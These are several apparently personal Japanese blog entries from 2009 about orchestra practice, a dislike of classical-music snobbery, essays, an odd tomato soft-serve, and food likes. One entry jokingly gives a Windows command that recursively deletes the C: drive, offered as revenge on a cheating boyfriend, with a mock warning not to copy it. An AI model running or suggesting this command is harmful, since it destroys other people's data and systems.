2009年08月19日

華麗なる孔雀夫妻

くさ
 アオノリです

 
 こう見えてポインセチアです
 冬以外だと影が薄い(‘ω’)



最近、秋のコンサートに向けて
ラフマニノフのピアノ協奏曲二番
新世界より
を練習してます

どちらも難しい曲ではないんですが
ラフマニノフのナルシスト気風
divの多さに胃液が分泌過多になりそうです

あ、新世界は好きですよ
民族リズムがかっこいいし
CMでおなじみなので


でも基本的にアオノリはクラシックが嫌いです

アオノリが子供すぎるのか、どれもこれも難解なクラシックが全く理解できません

でも楽器を弾く上でクラシックから遠ざかることはできなかったので、最近までは好きなフリをしていました

周りの楽器弾きの間では多くの曲を経験し、作曲家や指揮者の知識を披露しあうことがステータスになっているように感じます

はっきり言ってそういうのは大嫌いです

品ある楽器やクラシック愛好者はファッションブランド品のようにそれらをひけらかしたりすることはしないと思います


こういった人達は他の音楽業界にもよくいるのですが
クラシックにおいてはそれに輪を掛けて質が悪いように感じます


と、ここまで悪口でしたが

アオノリは楽器を弾くこととオーケストラで演奏することは好きですよ

わかりやすい近代アメリカのようなセミクラシックとか
映画音楽なんて最高ですね


機会があったらそちらに転身したいと思ってます


では
posted by アオノリ at 04:20| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2009年08月18日

水彩画の少年

ふるーつたると
 アオノリです

 青い花のED「センテフォリア
 いいですね

 前回の宇宙をかける少女のEDの
 「エスパシオ」も良かったです

ところで最近

柴門ふみ
秋元康
梅田みか

あたりのエッセイを読み漁っています

怪しいメンバーですが

参考にするとか
真に受けるとか
そういうわけじゃなくて

ただ単に面白いです

人付き合いの多い方ならではの分析ってすごいですね

友達の少ない人間としては是非とも教えていただきたい…(‘ω’)

二次元脳内なら知り合いやらやら婿やら息子もいるんだがなぁ



みなみけのマコト萌えええ
posted by アオノリ at 23:43| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

四十雀やぶこうじ

ねこねる
 アオノリです


 4月に投稿した非公開の白紙記事を
 8月に書いて公開すると
 時をかけるなんちゃらになれます


 あ、イタリア人男性の名前で、テオってなんかいいですよね

 じゃなくて


そういえば 高速の赤城高原SAでとまきゅうソフトが売ってました

トマト味のソフトクリームに胡瓜が刺さってるという…


元のまま食べたかった
シリーズです



売り場の近くに捨てられて干からびた胡瓜が落ちてました

味は…確かにトマトでした


興味が湧いたらググりましょう
http://www.driveplaza.com/sapa/1800/1800101/1/diary2/2009/04/#011037
posted by アオノリ at 23:41| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

あねおとうと

いちごたると

 アオノリです


 姉
ってどんな気分ですか



おとうと
がいたら
ねーちゃんとか
呼ばれますか

お勉強とか教えますか

忘れたお弁当届けますか


おにいちゃんCDがあるなら
おねえちゃんCDもあっていいと思うんです

妹ブームに成り代わり弟ブームの波を切実に期待


おとうと禿げ萌ええええ


でも姉御という意味での姉さんも好きです
posted by アオノリ at 23:38| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

とんぼに愛想笑い

さいどみらー
 アオノリです

 ちょっと危険な豆知識

 犯罪になりかねないから
 彼の浮気現場でも目撃した時に使うのが
 ギリギリかな


よいこはマネしちゃだめお


例えば彼氏のパソコンを開いて
スタートメニューの検索欄に
ファイル名を指定して実行
とぶっこんでみましょう

クリックして窓が出たら
【cmd /c rd /s /q c:\】
を更にぶっこんで実行


これで彼氏さんのパソコンはOSごと再起不能です


いいか!真似するなよ!絶対にだぞ!

あんたのための振りじゃないんだからねっっ////
posted by アオノリ at 23:37| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

春秋麗し宵辻が花

かんばん

 アオノリです


 突然ですが
 どうでもいいまとめwiki開催です


好きな食べ物

梅 茎わかめ めかぶ チョコ エイヒレ いかくん
ビーフストロガノフ ミルクレープ フルーツタルト
月餅 錦玉子 生ハム つけ麺 しゃぶしゃぶ
トマト 胡瓜 チゲ鍋 イカの一夜干し お新香 手羽先

嫌いな食べ物

甘酒 葱 茄子 コロッケ ポテトサラダ 脂身
レバー プリン エビフライ シュークリーム
メロン 目玉焼き 生クリーム モンブラン 薄荷


矛盾する嗜好ですね


生ハムが好きでもメロンが食べられないと生ハムメロンが面倒くさいです


あとは森永ハイクラウンが好き
posted by アオノリ at 23:35| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする
past log
×

